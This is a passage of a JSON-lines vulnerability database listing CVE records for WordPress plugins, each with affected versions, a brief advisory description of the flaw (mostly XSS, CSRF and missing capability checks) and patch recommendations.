ph_mail=#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2914042%40bp-social-connect%2Ftrunk&old=1904372%40bp-social-connect%2Ftrunk&sfp_email=&sfph_mail=#file6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13465","slug":"ablocks","versionImpact":"1.6.1","versionEndExcluding":"1.6.2","description":"The aBlocks \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \"Table Of Content\" Block, specifically in the \"markerView\" attribute, in all versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3236611%40ablocks&new=3236611%40ablocks&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3236611%40ablocks&new=3236611%40ablocks&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abdb6632-d579-4650-b058-da10201cca8c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abdb6632-d579-4650-b058-da10201cca8c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4409","slug":"wp-vipergb","versionImpact":"1.6.1","versionEndExcluding":"1.6.2","description":"The WP-ViperGB plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6.1. This is due to missing or incorrect nonce validation when saving plugin settings. This makes it possible for unauthenticated attackers to change the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e86581bd-94c3-4b05-9590-ca3b62073703?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e86581bd-94c3-4b05-9590-ca3b62073703?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3091230%40wp-vipergb%2Ftrunk&old=2812759%40wp-vipergb%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3091230%40wp-vipergb%2Ftrunk&old=2812759%40wp-vipergb%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50896","slug":"weforms","versionEndExcluding":"1.6.18","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in weForms weForms \u2013 Easy Drag & Drop Contact Form Builder For WordPress allows Stored XSS.This issue affects weForms \u2013 Easy Drag & Drop Contact Form Builder For WordPress: from n\/a through 1.6.17.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/weforms\\\/wordpress-weforms-plugin-1-6-17-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/weforms\\\/wordpress-weforms-plugin-1-6-17-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3494","slug":"mesmerize-companion","versionImpact":"1.6.148","versionEndExcluding":"1.6.149","description":"The Mesmerize Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mesmerize_contact_form' shortcode in all versions up to, and including, 1.6.148 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.149, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/521bb5a3-0a0c-4693-a87d-fabb64f1ad4f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/521bb5a3-0a0c-4693-a87d-fabb64f1ad4f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078422\\\/mesmerize-companion\\\/trunk\\\/theme-data\\\/mesmerize\\\/functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3078422\\\/mesmerize-companion\\\/trunk\\\/theme-data\\\/mesmerize\\\/functions.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11876","slug":"kredeum-nfts","versionImpact":"1.6.9","versionEndExcluding":"1.6.10","description":"The Kredeum NFTs, the easiest way to sell your NFTs directly on your WordPress site plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'kredeum_opensky' shortcode in all versions up to, and including, 1.6.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kredeum-nfts\\\/trunk\\\/common\\\/shortcode\\\/shortcode.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kredeum-nfts\\\/trunk\\\/common\\\/shortcode\\\/shortcode.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3eb74ac2-ac5d-477b-8142-3e42953f859b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3eb74ac2-ac5d-477b-8142-3e42953f859b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0357","slug":"wpbookit","versionImpact":"1.6.9","versionEndExcluding":"1.6.10","description":"The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'WPB_Profile_controller::handle_image_upload' function in versions up to, and including, 1.6.9. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.6.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/documentation.iqonic.design\\\/wpbookit\\\/versions\\\/change-log\",\"name\":\"https:\\\/\\\/documentation.iqonic.design\\\/wpbookit\\\/versions\\\/change-log\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19bf7a68-e76d-4740-9f35-b6084094f59b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19bf7a68-e76d-4740-9f35-b6084094f59b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11370","slug":"subaccounts-for-woocommerce","versionImpact":"1.6.0","versionEndExcluding":"1.6.1","description":"The Subaccounts for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subaccounts-for-woocommerce\\\/tags\\\/1.5.6\\\/admin\\\/admin.php#L37\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/subaccounts-for-woocommerce\\\/tags\\\/1.5.6\\\/admin\\\/admin.php#L37\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f383a56-21e3-4f06-b4d4-47a269007cdc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f383a56-21e3-4f06-b4d4-47a269007cdc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2295","slug":"contact-form-manager","versionImpact":"1.6","versionEndExcluding":"1.6.1","description":"The Contact Form Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's [xyz-cfm-form] shortcode in all versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cda411b-b277-4b4d-9087-dadede4b67dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cda411b-b277-4b4d-9087-dadede4b67dd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3095454%40contact-form-manager&new=3095454%40contact-form-manager&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3095454%40contact-form-manager&new=3095454%40contact-form-manager&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8715","slug":"simple-ldap-login","versionImpact":"1.6.0","versionEndExcluding":"1.6.1","description":"The Simple LDAP Login plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbaa95d4-899f-49a0-a888-4ffee61c0335?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbaa95d4-899f-49a0-a888-4ffee61c0335?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158322\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3158322\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-ldap-login\\\/tags\\\/1.6.0\\\/Simple-LDAP-Login-Admin.php#L15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-ldap-login\\\/tags\\\/1.6.0\\\/Simple-LDAP-Login-Admin.php#L15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11600","slug":"borderless","versionImpact":"1.6.0","versionEndExcluding":"1.6.1","description":"The Borderless \u2013 Widgets, Elements, Templates and Toolkit for Elementor & Gutenberg plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.5.9 via the 'write_config' function. This is due to a lack of sanitization on an imported JSON file. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute code on the server.","recommendation":"Update to version 1.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/tags\\\/1.5.7\\\/includes\\\/icon-manager\\\/icon-manager.php#L249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/tags\\\/1.5.7\\\/includes\\\/icon-manager\\\/icon-manager.php#L249\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/tags\\\/1.5.7\\\/includes\\\/icon-manager\\\/icon-manager.php#L333\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/tags\\\/1.5.7\\\/includes\\\/icon-manager\\\/icon-manager.php#L333\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/tags\\\/1.5.7\\\/includes\\\/icon-manager\\\/icon-manager.php#L388\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/tags\\\/1.5.7\\\/includes\\\/icon-manager\\\/icon-manager.php#L388\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/643b8b82-c4e1-4b81-a7e0-aee0f9270702?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/643b8b82-c4e1-4b81-a7e0-aee0f9270702?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9210","slug":"mailchimp-top-bar","versionImpact":"1.6.0","versionEndExcluding":"1.6.1","description":"The MC4WP: Mailchimp Top Bar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b45ba98f-4cd1-406a-8661-e19d5b4c3ba8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b45ba98f-4cd1-406a-8661-e19d5b4c3ba8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-top-bar\\\/tags\\\/1.6.0\\\/views\\\/settings-page.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-top-bar\\\/tags\\\/1.6.0\\\/views\\\/settings-page.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-top-bar\\\/tags\\\/1.6.1\\\/views\\\/settings-page.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-top-bar\\\/tags\\\/1.6.1\\\/views\\\/settings-page.php#L40\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47230","slug":"contact-forms","versionImpact":"1.6.0","versionEndExcluding":"1.6.1","description":"Cross-Site Request Forgery (CSRF) vulnerability in Cimatti Consulting WordPress Contact Forms by Cimatti plugin <=\u00a01.6.0 versions.","recommendation":"Update to version 1.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-forms\\\/wordpress-wordpress-contact-forms-by-cimatti-plugin-1-6-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-forms\\\/wordpress-wordpress-contact-forms-by-cimatti-plugin-1-6-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11814","slug":"order-status-for-woocommerce","versionImpact":"1.6.0","versionEndExcluding":"1.6.1","description":"The Additional Custom Order Status for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the wfwp_wcos_delete_finished, wfwp_wcos_delete_fallback_finished, wfwp_wcos_delete_fallback_orders_updated, and wfwp_wcos_delete_fallback_status parameters in all versions up to, and including, 1.6.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3198852%40order-status-for-woocommerce%2Ftrunk&old=3179390%40order-status-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3198852%40order-status-for-woocommerce%2Ftrunk&old=3179390%40order-status-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28267144-a709-4631-8925-69c6e0aca77c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28267144-a709-4631-8925-69c6e0aca77c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0540","slug":"gs-portfolio","versionEndExcluding":"1.6.1","description":"The GS Filterable Portfolio WordPress plugin before 1.6.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b35b3da2-468d-4fe5-bff6-812432197a38\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b35b3da2-468d-4fe5-bff6-812432197a38\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12164","slug":"wpsyncsheets-wpforms","versionImpact":"1.6","versionEndExcluding":"1.6.1","description":"The WPSyncSheets Lite For WPForms \u2013 WPForms Google Spreadsheet Addon plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpsslwp_reset_settings() function in all versions up to, and including, 1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to reset the plugin's settings.","recommendation":"Update to version 1.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpsyncsheets-wpforms\\\/tags\\\/1.5\\\/includes\\\/class-wpsslwp-service.php#L779\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpsyncsheets-wpforms\\\/tags\\\/1.5\\\/includes\\\/class-wpsslwp-service.php#L779\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpsyncsheets-wpforms\\\/tags\\\/1.5\\\/includes\\\/class-wpsslwp-service.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpsyncsheets-wpforms\\\/tags\\\/1.5\\\/includes\\\/class-wpsslwp-service.php#L92\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234445\\\/wpsyncsheets-wpforms\\\/tags\\\/1.6.1\\\/includes\\\/class-wpsslwp-service.php?old=3232281&old_path=wpsyncsheets-wpforms%2Ftags%2F1.6%2Fincludes%2Fclass-wpsslwp-service.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234445\\\/wpsyncsheets-wpforms\\\/tags\\\/1.6.1\\\/includes\\\/class-wpsslwp-service.php?old=3232281&old_path=wpsyncsheets-wpforms%2Ftags%2F1.6%2Fincludes%2Fclass-wpsslwp-service.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83bd48fb-f5f9-4d3d-8fc4-a06adfa5a225?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83bd48fb-f5f9-4d3d-8fc4-a06adfa5a225?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32267","slug":"wp-to-hootsuite","versionImpact":"1.5.9","versionEndExcluding":"1.6.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in wpzinc Post to Social Media \u2013 WordPress to Hootsuite allows Cross Site Request Forgery. This issue affects Post to Social Media \u2013 WordPress to Hootsuite: from n\/a through 1.5.8.","recommendation":"Update to version 1.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-to-hootsuite\\\/vulnerability\\\/wordpress-wp-to-hootsuite-plugin-1-5-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-to-hootsuite\\\/vulnerability\\\/wordpress-wp-to-hootsuite-plugin-1-5-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0178","slug":"anual-archive","versionEndExcluding":"1.6.0","description":"The Annual Archive WordPress plugin before 1.6.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cc308e15-7937-4d41-809d-74f8c13bee23\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cc308e15-7937-4d41-809d-74f8c13bee23\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13661","slug":"wp-table-editor","versionImpact":"1.5.1","versionEndExcluding":"1.6.0","description":"The Table Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wptableeditor_vtabs' shortcode in all versions up to, and including, 1.5.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-table-editor\\\/trunk\\\/includes\\\/public\\\/shortcode.php#L333\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-table-editor\\\/trunk\\\/includes\\\/public\\\/shortcode.php#L333\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3228279%40wp-table-editor&new=3228279%40wp-table-editor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3228279%40wp-table-editor&new=3228279%40wp-table-editor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fe1f3c3-4a81-4aae-9a5e-e5889f4c69ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fe1f3c3-4a81-4aae-9a5e-e5889f4c69ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-46823","slug":"imagelinks-interactive-image-builder-lite","versionEndExcluding":"1.6.0","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Avirtum ImageLinks Interactive Image Builder for WordPress allows SQL Injection.This issue affects ImageLinks Interactive Image Builder for WordPress: from n\/a through 1.5.4.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/imagelinks-interactive-image-builder-lite\\\/wordpress-imagelinks-interactive-image-builder-for-wordpress-plugin-1-5-4-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/imagelinks-interactive-image-builder-lite\\\/wordpress-imagelinks-interactive-image-builder-for-wordpress-plugin-1-5-4-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11583","slug":"borderless","versionImpact":"1.5.9","versionEndExcluding":"1.6.0","description":"The Borderless \u2013 Widgets, Elements, Templates and Toolkit for Elementor & Gutenberg plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'remove_zipped_font' function in all versions up to, and including, 1.5.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete icon fonts that were previously uploaded.","recommendation":"Update to version 1.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/tags\\\/1.5.7\\\/includes\\\/icon-manager\\\/icon-manager.php#L270\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/borderless\\\/tags\\\/1.5.7\\\/includes\\\/icon-manager\\\/icon-manager.php#L270\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0968fe3b-2256-41e8-8cc9-e800dd7f8c27?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0968fe3b-2256-41e8-8cc9-e800dd7f8c27?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10591","slug":"makewebbetter-hubspot-for-woocommerce","versionImpact":"1.5.9","versionEndExcluding":"1.6.0","description":"The MWB HubSpot for WooCommerce \u2013 CRM, Abandoned Cart, Email Marketing, Marketing Automation & Analytics plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the hubwoo_save_updates() function in all versions up to, and including, 1.5.9. This makes it possible for authenticated attackers, with Contributor-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 1.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/makewebbetter-hubspot-for-woocommerce\\\/trunk\\\/includes\\\/class-hubwoo-ajax-handler.php#L845\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/makewebbetter-hubspot-for-woocommerce\\\/trunk\\\/includes\\\/class-hubwoo-ajax-handler.php#L845\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd38b5f2-f13e-4433-9a8a-2f42cc1782c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd38b5f2-f13e-4433-9a8a-2f42cc1782c6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-47161","slug":"health-check","versionEndExcluding":"1.6.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in The WordPress.Org community Health Check & Troubleshooting plugin <=\u00a01.5.1 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/health-check\\\/wordpress-health-check-troubleshooting-plugin-1-5-1-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/health-check\\\/wordpress-health-check-troubleshooting-plugin-1-5-1-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10780","slug":"restaurant-cafe-addon-for-elementor","versionImpact":"1.5.9","versionEndExcluding":"1.6.0","description":"The Restaurant & Cafe Addon for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.5.9 via the 'narestaurant_elementor_template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 1.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197286%40restaurant-cafe-addon-for-elementor&new=3197286%40restaurant-cafe-addon-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197286%40restaurant-cafe-addon-for-elementor&new=3197286%40restaurant-cafe-addon-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8c29cbd-6c39-4a54-a2a2-bc4c8feeeb70?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8c29cbd-6c39-4a54-a2a2-bc4c8feeeb70?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
